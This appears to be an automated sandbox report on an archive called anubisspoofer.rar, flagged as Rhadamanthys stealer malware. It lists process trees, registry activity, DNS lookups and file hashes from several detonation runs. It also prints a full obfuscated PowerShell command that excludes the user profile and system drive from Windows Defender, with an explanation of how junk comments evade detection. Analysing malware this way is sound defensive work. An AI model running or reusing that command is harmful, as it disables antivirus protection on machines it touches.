Analysis Overview
SHA256
939cdd940184fa0be3ac8de9330d66e144d93396098713278e736e6ab1396f72
Threat Level: Known bad
The file anubisspoofer.rar was found to be: Known bad.
Malicious Activity Summary
Detect rhadamanthys stealer shellcode
Rhadamanthys
Loads dropped DLL
Executes dropped EXE
Checks computer location settings
Obfuscated Files or Information: Command Obfuscation
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Unsigned PE
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Suspicious behavior: AddClipboardFormatListener
Suspicious behavior: GetForegroundWindowSpam
Checks SCSI registry key(s)
Suspicious use of SetWindowsHookEx
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Suspicious use of SendNotifyMessage
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-09-28 09:56
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-09-28 09:56
Reported
2024-09-28 09:59
Platform
win7-20240903-en
Max time kernel
146s
Max time network
120s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_Classes\Local Settings | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_Classes\Local Settings | C:\Windows\system32\rundll32.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 2384 wrote to memory of 2732 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2384 wrote to memory of 2732 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2384 wrote to memory of 2732 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2732 wrote to memory of 2688 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\rundll32.exe |
| PID 2732 wrote to memory of 2688 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\rundll32.exe |
| PID 2732 wrote to memory of 2688 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\rundll32.exe |
| PID 2688 wrote to memory of 2900 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files\VideoLAN\VLC\vlc.exe |
| PID 2688 wrote to memory of 2900 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files\VideoLAN\VLC\vlc.exe |
| PID 2688 wrote to memory of 2900 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files\VideoLAN\VLC\vlc.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\anubisspoofer.rar
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\anubisspoofer.rar
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\anubisspoofer.rar
C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\anubisspoofer.rar"
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-09-28 09:56
Reported
2024-09-28 09:59
Platform
win10v2004-20240802-en
Max time kernel
93s
Max time network
95s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\anubisspoofer.rar
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-09-28 09:56
Reported
2024-09-28 09:59
Platform
win7-20240903-en
Max time kernel
14s
Max time network
18s
Command Line
Signatures
Detect rhadamanthys stealer shellcode
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Rhadamanthys
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Anubis.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Anubis.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Anubis.exe | N/A |
Obfuscated Files or Information: Command Obfuscation
The powershell.exe process listed under Processes below is started with an -EncodedCommand whose base64 payload (UTF-16LE) decodes to `Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force`, with junk `<# ... #>` comment blocks inserted between the tokens to defeat string matching; the effect is to exclude the user profile and the whole system drive from Windows Defender scanning.
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Anubis.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Anubis.exe
"C:\Users\Admin\AppData\Local\Temp\Anubis.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAYQBzACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAegBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAcABnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAdgBuACMAPgA="
C:\Users\Admin\AppData\Local\Temp\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe
"C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c pause
Network
Files
\Users\Admin\AppData\Local\Temp\Launcher.exe
| Hash | Value |
| --- | --- |
| MD5 | a8db312e9364d1d82600bf5a398212fe |
| SHA1 | 3bbacada2b463bb9f62ed7ae34a8e8440bc91dcb |
| SHA256 | 84e01afa9f1f134caa4e49456f4a1700e17bae4cbd962c1dfdf6cdfd61b3a3cb |
| SHA512 | a7994ab1901aa1fc6ee89a302a92c9ec7fc3febc348a21e0445d4e17bb2c736ef563543dde94a01fe5d81094e792b354db1d02f8069992b36791fdbb0f8a5782 |
\Users\Admin\AppData\Local\Temp\WindowsHost.exe
| Hash | Value |
| --- | --- |
| MD5 | 515a0c8be21a5ba836e5687fc2d73333 |
| SHA1 | c52be9d0d37ac1b8d6bc09860e68e9e0615255ab |
| SHA256 | 9950788284df125c7359aeb91435ed24d59359fac6a74ed73774ca31561cc7ae |
| SHA512 | 4e2bd7ce844bba25aff12e2607c4281b59f7579b9407139ef6136ef09282c7afac1c702adebc42f8bd7703fac047fd8b5add34df334bfc04d3518ea483225522 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-09-28 09:56
Reported
2024-09-28 09:57
Platform
win10v2004-20240802-en
Max time kernel
20s
Max time network
22s
Command Line
Signatures
Detect rhadamanthys stealer shellcode
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Rhadamanthys
Checks computer location settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Anubis.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe | N/A |
Obfuscated Files or Information: Command Obfuscation
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Anubis.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID | C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Anubis.exe
"C:\Users\Admin\AppData\Local\Temp\Anubis.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAYQBzACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAegBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAcABnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAdgBuACMAPgA="
C:\Users\Admin\AppData\Local\Temp\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe
"C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c pause
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\Launcher.exe
| Hash | Value |
| --- | --- |
| MD5 | a8db312e9364d1d82600bf5a398212fe |
| SHA1 | 3bbacada2b463bb9f62ed7ae34a8e8440bc91dcb |
| SHA256 | 84e01afa9f1f134caa4e49456f4a1700e17bae4cbd962c1dfdf6cdfd61b3a3cb |
| SHA512 | a7994ab1901aa1fc6ee89a302a92c9ec7fc3febc348a21e0445d4e17bb2c736ef563543dde94a01fe5d81094e792b354db1d02f8069992b36791fdbb0f8a5782 |
C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe
| Hash | Value |
| --- | --- |
| MD5 | 515a0c8be21a5ba836e5687fc2d73333 |
| SHA1 | c52be9d0d37ac1b8d6bc09860e68e9e0615255ab |
| SHA256 | 9950788284df125c7359aeb91435ed24d59359fac6a74ed73774ca31561cc7ae |
| SHA512 | 4e2bd7ce844bba25aff12e2607c4281b59f7579b9407139ef6136ef09282c7afac1c702adebc42f8bd7703fac047fd8b5add34df334bfc04d3518ea483225522 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s5dae4za.q2s.ps1
| Hash | Value |
| --- | --- |
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
Analysis: behavioral5
Detonation Overview
Submitted
2024-09-28 09:56
Reported
2024-09-28 09:59
Platform
win7-20240903-en
Max time kernel
121s
Max time network
122s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 1708 wrote to memory of 1444 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\WerFault.exe |
| PID 1708 wrote to memory of 1444 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\WerFault.exe |
| PID 1708 wrote to memory of 1444 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\WerFault.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\spooferconfig.dll,#1
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1708 -s 260
Network
Files
Analysis: behavioral6
Detonation Overview
Submitted
2024-09-28 09:56
Reported
2024-09-28 09:59
Platform
win10v2004-20240802-en
Max time kernel
93s
Max time network
95s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\spooferconfig.dll,#1
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |